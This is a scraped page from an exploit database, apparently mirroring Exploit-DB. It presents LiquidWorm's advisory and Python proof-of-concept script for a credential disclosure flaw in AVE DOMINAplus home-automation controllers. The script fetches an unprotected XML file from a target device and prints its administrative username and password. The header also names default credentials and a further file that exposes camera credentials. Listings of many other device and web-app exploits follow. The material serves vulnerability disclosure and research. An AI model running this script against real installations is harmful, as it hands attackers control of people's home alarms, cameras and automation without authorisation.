Menu

Search for hundreds of thousands of exploits

"AVE DOMINAplus 1.10.x - Credential Disclosure"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-12-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
# Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: AVE S.p.A.
# Product web page: https://www.ave.it | https://www.domoticaplus.it
# Affected version: Web Server Code 53AB-WBS - 1.10.62
# Advisory ID: ZSL-2019-5550
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php

#!/usr/bin/env python
#
#
# AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit
#
#
# Vendor: AVE S.p.A.
# Product web page: https://www.ave.it | https://www.domoticaplus.it
# Affected version: Web Server Code 53AB-WBS - 1.10.62
#                   Touch Screen Code TS01 - 1.0.65
#                   Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
#                   Touch Screen Code TS05 - 1.10.36
#                   Models: 53AB-WBS
#                           TS01
#                           TS03V
#                           TS04X-V
#                           TS05N-V
#                   App version: 1.10.77
#                   App version: 1.10.65
#                   App version: 1.10.64
#                   App version: 1.10.62
#                   App version: 1.10.60
#                   App version: 1.10.52
#                   App version: 1.10.52A
#                   App version: 1.10.49
#                   App version: 1.10.46
#                   App version: 1.10.45
#                   App version: 1.10.44
#                   App version: 1.10.35
#                   App version: 1.10.25
#                   App version: 1.10.22
#                   App version: 1.10.11
#                   App version: 1.8.4
#                   App version: TS1-1.0.65
#                   App version: TS1-1.0.62
#                   App version: TS1-1.0.44
#                   App version: TS1-1.0.10
#                   App version: TS1-1.0.9
#
# Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
# Designed to revolutionize your concept of living. DOMINA plus is the AVE home
# automation proposal that makes houses safer, more welcoming and optimized. In
# fact, our home automation system introduces cutting-edge technologies, designed
# to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
# and security and offers advanced supervision tools in order to learn how to evaluate
# and reduce consumption through various solutions dedicated to energy saving.
#
# Desc: The application suffers from clear-text credentials disclosure vulnerability
# that allows an unauthenticated attacker to issue a request to an unprotected directory
# that hosts an XML file '/xml/authClients.xml' and obtain administrative login information
# that allows for a successful authentication bypass attack.
#
# Default credentials: admin:password
# Configuration and camera credentials disclosure: /xml/tsconf.xml
#
# ==================================================
# [email protected]:~/domina# ./poc.py http://192.168.1.10
#
# Ze microfilm:
# -------------
# Username: arnoldcontrol
# Password: P1sD0nt5pYMe
# ==================================================
#
# Tested on: GNU/Linux 4.1.19-armv7-x7
#            GNU/Linux 3.8.13-bone50/bone71.1/bone86
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Debian)
#            PHP/5.5.9-1ubuntu4.23
#            PHP/5.4.41-0+deb7u1
#            PHP/5.4.36-0+deb7u3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5550
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
#
#
# 06.10.2019
#

import sys,re
import xml.etree.ElementTree as XML

from urllib2 import Request,urlopen

if (len(sys.argv) <= 1):
    print '[*] Usage: poc.py http://ip:port'
    exit(0)

host = sys.argv[1]
headers = {'Accept': 'application/xml'}
request = Request(host+'/xml/authClients.xml', headers=headers)
print '\nZe microfilm:'
print '-------------'
xml = urlopen(request).read()
tree = XML.fromstring(xml)

for user in tree.findall('customer'):
    print 'Username: ',user.get('plantCode')

for pwd in tree.iter('password'):
    print 'Password: '+pwd.text+'\n'
Release DateTitleTypePlatformAuthor
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
Release DateTitleTypePlatformAuthor
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-03"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection"webappshardware"Paulina Girón"
2020-03-03"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection"webappshardware"Olga Villagran"
2020-03-02"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)"webappshardware"Elber Tavares"
2020-03-02"Netis WF2419 2.2.36123 - Remote Code Execution"webappshardware"Elias Issa"
2020-03-02"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)"webappshardware"Elber Tavares"
2020-03-02"TP LINK TL-WR849N - Remote Code Execution"webappshardware"Elber Tavares"
2020-02-27"Comtrend VR-3033 - Command Injection"webappshardware"Raki Ben Hamouda"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting"webappshardware"Scott Goodwin"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-05"Wago PFC200 - Authenticated Remote Code Execution (Metasploit)"webappshardware0x483d
2020-02-05"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account"remotehardwareSnawoot
2020-02-03"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection"webappshardware"Cosmin Craciun"
2020-01-29"Satellian 1.12 - Remote Code Execution"webappshardwareXh4H
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2020-01-24"Genexis Platinum-4410 2.1 - Authentication Bypass"webappshardware"Husinul Sanub"
2020-01-24"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot"webappshardwarePCEumel
2020-01-15"Sagemcom [email protected] 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution"remotehardwareLyrebirds
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
Release DateTitleTypePlatformAuthor
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"Thrive Smart Home 1.1 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)"webappsphpLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Authentication Bypass"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Remote Code Execution"webappsphpLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Credential Disclosure"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot"webappshardwareLiquidWorm
2019-12-30"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials"localhardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery"webappshardwareLiquidWorm
2019-12-02"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery"webappsphpLiquidWorm
2019-11-14"Siemens Desigo PX 6.00 - Denial of Service (PoC)"doshardwareLiquidWorm
2019-11-13"Linear eMerge E3 1.00-06 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution"remotehardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Cross-Site Request Forgery"webappshardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)"remotehardwareLiquidWorm
2019-11-12"Prima FlexAir Access Control 2.3.38 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Arbitrary File Upload"webappshardwareLiquidWorm
2019-11-12"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting"webappshardwareLiquidWorm
2019-11-12"CBAS-Web 19.0.0 - Information Disclosure"remotehardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Unauthenticated Directory Traversal"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Privilege Escalation"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting"webappshardwareLiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47819/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse